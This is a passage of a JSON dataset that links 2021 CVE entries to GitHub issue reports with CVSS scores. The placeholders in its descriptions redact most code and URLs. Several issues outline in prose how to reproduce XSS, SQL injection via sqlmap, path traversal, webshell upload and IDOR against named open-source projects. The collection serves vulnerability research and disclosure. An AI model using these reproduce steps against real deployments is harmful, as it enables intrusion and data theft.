        "description": "APITAG return value check. Hi, Two previous issues NUMBERTAG and NUMBERTAG show that a return value check for APITAG is necessary and it can cause read out of bound with a corrupted TGA file. APITAG is similar to APITAG and it also shows the error condition in its return value. some usages for APITAG are comparing return values to see any error occurred or not. (in FILETAG and FILETAG but there are some other call sites that do not check the return value and also the passed arguments are tainted and can be corrupted. this is the list of them: |file|function|line| | | | | |gd_webp.c| APITAG |gd_bmp.c | APITAG NUMBERTAG gd_bmp.c | APITAG NUMBERTAG APITAG so they need to add some condition check for APITAG . Regards.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40881",
        "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/57",
        "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/57",
        "Repo_new": "sanluan/publiccms",
        "Issue_Created_At": "2021-09-07T02:44:20Z",
        "description": "The default bat file parameters are controllable, resulting in rce. In the selection of planned tasks, the parameters are controllable and repo can be echoed directly, so the parameters of the parameters will be imported into the default bat warehouse script and the executed commands can be echoed url\uff1a URLTAG FILETAG The parameters of the parameters should be controlled",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40882",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1477",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1477",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2021-09-07T03:39:07Z",
        "description": "Persistent cross site scripts in Piwigo system album properties (version NUMBERTAG Description: Piwigo system album name and description of the location can be written to XSS code, resulting in persistent cross site scripting attacks Vulnerable Instances: FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40883",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/108",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/108",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2021-09-09T01:15:50Z",
        "description": "emlog NUMBERTAG has RCE vulnerability. in FILETAG line NUMBERTAG FILETAG After decompression, the uploaded file will be automatically saved PATHTAG so We can add our own webshell in the plugins file downloaded from the official APITAG upload and access it FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40884",
        "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/992",
        "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/992",
        "Repo_new": "projectsend/projectsend",
        "Issue_Created_At": "2021-09-07T05:13:56Z",
        "description": "Insecure Object Reference in Files function. Dear MENTIONTAG MENTIONTAG , I have found an IDOR vulnerability in Files function. Description Because of not checking authorization in parameters ids and id , The user with uploader role can download , edit all files of users in application To Reproduce Download file NUMBERTAG Access url APITAG url NUMBERTAG Add value for id parameter from APITAG > APITAG to download all files in application FILETAG Edit File NUMBERTAG Access url APITAG NUMBERTAG Add value for id parameter from APITAG > APITAG to edit all files in application Files of user kietna on application FILETAG User kietna edit private file of admin user FILETAG FILETAG FILETAG Solution You need to check authorization for id and ids parameters, make sure that a user on the system can only interact with that user's files",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40886",
        "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/993",
        "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/993",
        "Repo_new": "projectsend/projectsend",
        "Issue_Created_At": "2021-09-07T07:07:48Z",
        "description": "Path traversal in Upload file function. Dear MENTIONTAG I found a Path traversal vulnerability on your application! Description Because of not checking if clause for chunks parameter and use APITAG wrapper, the user with Uploader role can add value APITAG for chunks param to bypass APITAG santitizer and add another APITAG like APITAG to use APITAG wrapper and upload file to any place of server FILETAG In Step NUMBERTAG parameter that I can control when using upload function chunk , chunks , APITAG In Step NUMBERTAG The if clause check if chunks parameter < APITAG , the APITAG parameter will be handled. So i add value APITAG for chunks param then it will pass Step NUMBERTAG and go to Step NUMBERTAG FILETAG if i don't add value for chunk then the chunk parameter goes to APITAG and add value APITAG for chunks parameter, i can pass this if FILETAG Finally, if i add APITAG different from multipart , i can call APITAG wrapper to write a file on server with APITAG like APITAG Step To Reproduce NUMBERTAG Use burpsuite to capture upload request NUMBERTAG Change Content Type header to APITAG NUMBERTAG Add APITAG APITAG NUMBERTAG The file was uploaded in webroot directory with APITAG name FILETAG Request: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40887",
        "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/994",
        "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/994",
        "Repo_new": "projectsend/projectsend",
        "Issue_Created_At": "2021-09-07T09:04:17Z",
        "description": "Path Traversal vulnerability in FILETAG . Dear MENTIONTAG , I found a Path traversal vulnerability in FILETAG Description Becase of lacking sanitization input for APITAG parameter, The attacker can add APITAG to move all of php files or any file on the system that has permissions to APITAG folder FILETAG Step To Reproduce NUMBERTAG Using burpsuite tool to capture request of FILETAG function NUMBERTAG Adding APITAG in APITAG parameter, in this step the attacker can move php files with the aim of sabotaging the system or read sentitive file in system like APITAG NUMBERTAG Then access APITAG to get a new name of file FILETAG NUMBERTAG Then access APITAG Request move APITAG file ERRORTAG FILETAG Then webroot returned Directory Listing because of moving APITAG file to APITAG folder FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40888",
        "Issue_Url_old": "https://github.com/projectsend/projectsend/issues/995",
        "Issue_Url_new": "https://github.com/projectsend/projectsend/issues/995",
        "Repo_new": "projectsend/projectsend",
        "Issue_Created_At": "2021-09-08T02:13:10Z",
        "description": "Reflected Cross site Scripting in APITAG function . Dear MENTIONTAG I found a vulnerability that execute malicious script of user, Description: Because of lacking of sanitizer when echo output data in APITAG function in APITAG , the low privilege user APITAG role) can call this function through FILETAG file and execute scripting code FILETAG FILETAG APITAG ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-40889",
        "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/19",
        "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/19",
        "Repo_new": "boiteasite/cmsuno",
        "Issue_Created_At": "2021-09-09T04:11:04Z",
        "description": "PHP Code Execution via change password function. Dear MENTIONTAG I found a security problem can lead to remote code execution in APITAG version NUMBERTAG Description: APITAG action in APITAG file call to APITAG function to write username in APITAG file when user successfully changed password, Becase of filtere without APITAG the attacker can inject malicious php code into FILETAG FILETAG APITAG FILETAG When submit username and password, php code will be executed FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40902",
        "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/57",
        "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/57",
        "Repo_new": "flatcore/flatcore-cms",
        "Issue_Created_At": "2021-09-06T15:27:36Z",
        "description": "Stored XSS in Index. Describe the bug Cross Site Scripting (XSS) via save Exclude URLs To Reproduce Steps to reproduce the behavior NUMBERTAG Login to flatcore CMS NUMBERTAG Click on APITAG new Page' after click APITAG NUMBERTAG Insert into a XSS payload in Exclude URLs NUMBERTAG And XSS save on : URLTAG Screenshots FILETAG XSS payload APITAG alert NUMBERTAG APITAG Desktop (please complete the following information): OS: all Browser : all Version : all Additional context The XSS attack will help the hacker get the login session of other users requiring them to have at least one APITAG new Pages\" permission.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-40921",
        "Issue_Url_old": "https://github.com/dmolsen/Detector/issues/35",
        "Issue_Url_new": "https://github.com/dmolsen/detector/issues/35",
        "Repo_new": "dmolsen/detector",
        "Issue_Created_At": "2021-09-09T08:02:29Z",
        "description": "FILETAG Where the Issue Occurred The code below displays the user controlled parameter cid without sufficient sanitization: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40922",
        "Issue_Url_old": "https://github.com/pixeline/bugs/issues/552",
        "Issue_Url_new": "https://github.com/pixeline/bugs/issues/552",
        "Repo_new": "pixeline/bugs",
        "Issue_Created_At": "2021-09-09T08:57:52Z",
        "description": "FILETAG Where the Issue Occurred The code below displays the user controlled parameter APITAG , APITAG , and email without sufficient sanitization: CVETAG CVETAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40925",
        "Issue_Url_old": "https://github.com/ladybirdweb/faveo-helpdesk/issues/5423",
        "Issue_Url_new": "https://github.com/ladybirdweb/faveo-helpdesk/issues/5423",
        "Repo_new": "ladybirdweb/faveo-helpdesk",
        "Issue_Created_At": "2021-09-10T02:01:59Z",
        "description": "APITAG XSS in FILETAG of bugs. Faveo Version NUMBERTAG and below versions PHP version NUMBERTAG Database Driver & Version : APITAG NUMBERTAG Server specification : Apache NUMBERTAG Turn on the APITAG in APITAG Description: Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Steps To Reproduce NUMBERTAG Go to the FILETAG NUMBERTAG Login NUMBERTAG Go tot the page with the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled input APITAG in APITAG without sufficient sanitization: URLTAG Note Although the dompdf page is accessible from localhost, it can be attacked if the localhost user clicks on the aforementioned link. Downloaded from [ ] master branch [ ] release tag NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40926",
        "Issue_Url_old": "https://github.com/JamesHeinrich/getID3/issues/341",
        "Issue_Url_new": "https://github.com/jamesheinrich/getid3/issues/341",
        "Repo_new": "jamesheinrich/getid3",
        "Issue_Created_At": "2021-09-10T03:02:54Z",
        "description": "APITAG XSS in FILETAG of APITAG NUMBERTAG Describe the bug Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. To Reproduce Steps to reproduce the behavior NUMBERTAG Access to the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled parameter showtagfiles without sufficient sanitization: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40927",
        "Issue_Url_old": "https://github.com/citelao/Spotify-for-Alfred/issues/137",
        "Issue_Url_new": "https://github.com/citelao/spotify-for-alfred/issues/137",
        "Repo_new": "citelao/spotify-for-alfred",
        "Issue_Created_At": "2021-09-13T01:49:14Z",
        "description": "APITAG XSS in FILETAG . Describe the bug Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. To Reproduce Steps to reproduce the behavior NUMBERTAG Access to the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled parameter ERRORTAG without sufficient sanitization: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40928",
        "Issue_Url_old": "https://github.com/d8ahazard/FlexTV/issues/37",
        "Issue_Url_new": "https://github.com/d8ahazard/flextv/issues/37",
        "Repo_new": "d8ahazard/flextv",
        "Issue_Created_At": "2021-09-13T02:14:03Z",
        "description": "APITAG XSS in FILETAG of Phlex and APITAG NUMBERTAG Are you hosting your own version of Flex TV, or using the one at FILETAG Yes NUMBERTAG On what OS are you running Flex TV? Ubuntu NUMBERTAG Are you using a new instance of XAMPP, or an existing webserver? Apache NUMBERTAG Turn on the APITAG in APITAG NUMBERTAG b. If not XAMPP, what APITAG stack are you using? No NUMBERTAG Have you enabled the sockets module and ensured PHP has write access to the directory containing Flex TV? Yes Description: Reflected Cross Site Scripting (XSS) may allow an attacker to execute APITAG code in the context of the victim\u2019s browser. This may lead to unauthorized actions being performed, unauthorized access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim. Steps To Reproduce NUMBERTAG Go to the page with the following link: URLTAG NUMBERTAG Boom! Where the Issue Occurred The code below displays the user controlled input APITAG in APITAG without sufficient sanitization: URLTAG For Phlex: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-40940",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/471",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/471",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2021-09-08T14:55:01Z",
        "description": "Monstra NUMBERTAG case without filtering leads to unrestricted file upload vulnerability. Brief of this vulnerability The Monstra NUMBERTAG source code does not filter the case of php, which leads to an unrestricted file upload vulnerability. Test Environment APITAG Affect version APITAG POC ERRORTAG APITAG FILETAG Reason of This Vulnerability APITAG in the Upload file module does not check whether the file extension is APITAG file\uff1a APITAG ERRORTAG Repair suggestions Add case verification at $_FILES['file']['name'], as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40941",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/644",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/644",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2021-08-25T02:03:31Z",
        "description": "allocator is out of memory in APITAG How to reproduce: CODETAG You can see the asan information below: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40942",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1908",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1908",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-09-07T10:07:06Z",
        "description": "heap buffer overflow in APITAG at APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...) Step to reproduce: CODETAG Env: Ubunut NUMBERTAG clang NUMBERTAG My cmd line an ASAN report APITAG add PATHTAG new new.mp4 ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40943",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/643",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/643",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2021-08-25T02:00:03Z",
        "description": "Null pointer reference in APITAG How to reproduce: CODETAG You can see the asan information below: ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40944",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1906",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1906",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-09-01T07:25:03Z",
        "description": "Null pointer reference in GPAC at PATHTAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [x] I looked for a similar issue and couldn't find any. [x] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...) Step to reproduce: CODETAG Im not sure if it's a correct usage of \"nhmlr filter\" , or by which way could i parse nhml file? Env: Ubunut NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-40954",
        "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/11",
        "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/11",
        "Repo_new": "bettershop/laiketui",
        "Issue_Created_At": "2021-09-10T09:35:05Z",
        "description": "Any file upload exists at the background plug in. Any file upload exists at the background plug in FILETAG Locate file\uff1a PATHTAG FILETAG Firstly, the upload format is not filtered. Secondly, uploading the compressed package will decompress the index file in the compressed package and automatically include the file As a result, files with any suffix can be uploaded or compressed packages can be uploaded. The compressed packages contain webshell files FILETAG Upload succeeded\uff01 FILETAG The file is in the PATHTAG Let's visit FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40955",
        "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/12",
        "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/12",
        "Repo_new": "bettershop/laiketui",
        "Issue_Created_At": "2021-09-10T12:12:54Z",
        "description": "Background SQL injection. Background SQL injection FILETAG Parameter id is not filtered FILETAG The corresponding url is URLTAG FILETAG Using sleep function to delay NUMBERTAG seconds as an example FILETAG FILETAG Using sleep function to delay NUMBERTAG seconds as an example FILETAG Get the database through sqlmap FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-40956",
        "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/13",
        "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/13",
        "Repo_new": "bettershop/laiketui",
        "Issue_Created_At": "2021-09-11T12:30:37Z",
        "description": "SQL injection exists in the APITAG menu management function. SQL injection exists in the APITAG menu management function FILETAG The link where SQL injection exists is APITAG Locate the vulnerable file APITAG FILETAG Because the parameter id is not filtered, it leads to SQL injection vulnerabilities ERRORTAG Use burpsuite to request url APITAG FILETAG View SQL monitoring FILETAG Use sqlmap SQL injection Get the database FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40978",
        "Issue_Url_old": "https://github.com/nisdn/CVE-2021-40978/issues/1",
        "Issue_Url_new": "https://github.com/nisdn/cve-2021-40978/issues/1",
        "Repo_new": "nisdn/cve-2021-40978",
        "Issue_Created_At": "2021-10-07T18:27:12Z",
        "description": "Did you report this upstream?. Did you report this upstream?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40978",
        "Issue_Url_old": "https://github.com/mkdocs/mkdocs/issues/2601",
        "Issue_Url_new": "https://github.com/mkdocs/mkdocs/issues/2601",
        "Repo_new": "mkdocs/mkdocs",
        "Issue_Created_At": "2021-10-08T03:48:27Z",
        "description": "CVETAG Path Traversal.. Hey! We have verified a security flaw in the current version of APITAG a path traversal failure affecting the built in dev server. That flaw turns the server susceptible to providing data outside the scope of the application allowing anyone to request sensitive files. If you need further information, don't hesitate to get in touch with me. CVETAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-40985",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/444",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/444",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2021-08-02T07:44:48Z",
        "description": "stack buffer underflow in htmldoc. os: ubuntu NUMBERTAG htmldoc version: master branch command : ./htmldoc webpage f FILETAG . APITAG FILETAG asan report ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-4103",
        "Issue_Url_old": "https://github.com/Vanessa219/vditor/issues/1133",
        "Issue_Url_new": "https://github.com/vanessa219/vditor/issues/1133",
        "Repo_new": "vanessa219/vditor",
        "Issue_Created_At": "2021-12-12T01:41:08Z",
        "description": "XSS \u6f0f\u6d1e. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-41036",
        "Issue_Url_old": "https://github.com/eclipse/paho.mqtt.embedded-c/issues/96",
        "Issue_Url_new": "https://github.com/eclipse/paho.mqtt.embedded-c/issues/96",
        "Repo_new": "eclipse/paho.mqtt.embedded-c",
        "Issue_Created_At": "2017-06-21T06:12:07Z",
        "description": "should check rem_len size in readpacket..",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-41043",
        "Issue_Url_old": "https://github.com/the-tcpdump-group/tcpslice/issues/11",
        "Issue_Url_new": "https://github.com/the-tcpdump-group/tcpslice/issues/11",
        "Repo_new": "the-tcpdump-group/tcpslice",
        "Issue_Created_At": "2021-06-30T11:50:26Z",
        "description": "Heap use after free. Tested on: version NUMBERTAG PRE GIT version NUMBERTAG a3 Command: tcpslice w FILETAG APITAG Segmentation fault Results NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG ffff NUMBERTAG fa7d bp NUMBERTAG fffffffd NUMBERTAG sp NUMBERTAG fffffffce NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG ffff NUMBERTAG fa7c in vsnprintf ( PATHTAG NUMBERTAG ffff NUMBERTAG in __snprintf_chk ( PATHTAG NUMBERTAG ffff NUMBERTAG ee in pcap_dump_open ( PATHTAG NUMBERTAG ea4 in extract_slice APITAG NUMBERTAG ea4 in main APITAG NUMBERTAG ffff NUMBERTAG a0b2 in __libc_start_main ( PATHTAG NUMBERTAG eadd in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41061",
        "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/16844",
        "Issue_Url_new": "https://github.com/riot-os/riot/issues/16844",
        "Repo_new": "riot-os/riot",
        "Issue_Created_At": "2021-09-14T07:24:59Z",
        "description": "ieee NUMBERTAG security: Nonce is reused after reboot. Description The frame counter used with ieee NUMBERTAG security is initialized with NUMBERTAG at startup. While it is protected against overflow, it is not protected against being reset, and that reset happens whenever the device restarts. As the key is flashed into the device in ieee NUMBERTAG security's normal operation, and the sender LL address is constant per device, the same nonce (varying only through the resetting frame counter) is used in the AES encryption multiple times. Reuse of the same (nonce, key) breaks confidentiality guarantees. (AES CCM is used here, so AIU it's not as bad URLTAG as if GCM were used, when there'd be key leakage). Steps to reproduce the issue APITAG done on microbit NUMBERTAG I have high confidence in this working on any APITAG encryption capable device). Sniff for packages, eg. by building the default module. Build the gcoap example with APITAG Send out a GET request to the sniffer module, path APITAG Repeat the request a few times (to cancel any jitter in the number of messages sent during startup) Reboot the device, eg. by power cycling it Send out GET requests to the same address, path APITAG Expected results Requests after the reboot use different sequence numbers. Actual results Requests after the reboot start from the same zero sequence number again. Requests have byte wise identical requests in regions of equal content, eg. (asterisks mine) ERRORTAG ERRORTAG APITAG the APITAG in the second row where the shared \"l\" of \"hello\" and \"well\" is, as well as the NUMBERTAG co\" of the \"core\" / \"coap\" option; variation is in MIDs (first row bytes NUMBERTAG token (second row, first NUMBERTAG bytes) and the diverting texts). Versions and cross references All since introduction in NUMBERTAG until current HEAD. Since NUMBERTAG the module in question has been marked as experimental. Disclosing this has been discussed in the closed security list URLTAG , and was deemed responsible given the overall circumstances. CVETAG CVETAG has been assigned to this issue. Road forward This is not trivial to fix, as we don't have any committed persistence inside generic devices, and even with APITAG minimal security the problem is just shifted (for FILETAG requires monotony of ASNs on the device which is equivalent to this problem, although it'd shift the attack difficulty to an active replay of old beacons). Likewise, most advanced modes need persistence, until (with ace ake authz URLTAG asymmetric negotiation comes into play. Off my head I don't know any standard solutions that can do with neither asymmetric cryptography nor local persistence; some randomness based scheme could possibly be deployed but it'd be very ad hoc, custom and eventually not easier than the existing solutions. I think that the discussion in NUMBERTAG can serve as a starting point.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-41097",
        "Issue_Url_old": "https://github.com/aurelia/path/issues/44",
        "Issue_Url_new": "https://github.com/aurelia/path/issues/44",
        "Repo_new": "aurelia/path",
        "Issue_Created_At": "2021-05-14T09:04:12Z",
        "description": "Prototype Pollution. I'm submitting a bug report APITAG of aurelia path is vulnerable to prototype pollution. POC aurelia blog is using APITAG to parse APITAG so it is vulnerable to prototype pollution NUMBERTAG Open the following URL: URLTAG NUMBERTAG Open Devtools Console, and check the APITAG NUMBERTAG You can notice Object being polluted with the \"asdf\" property.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
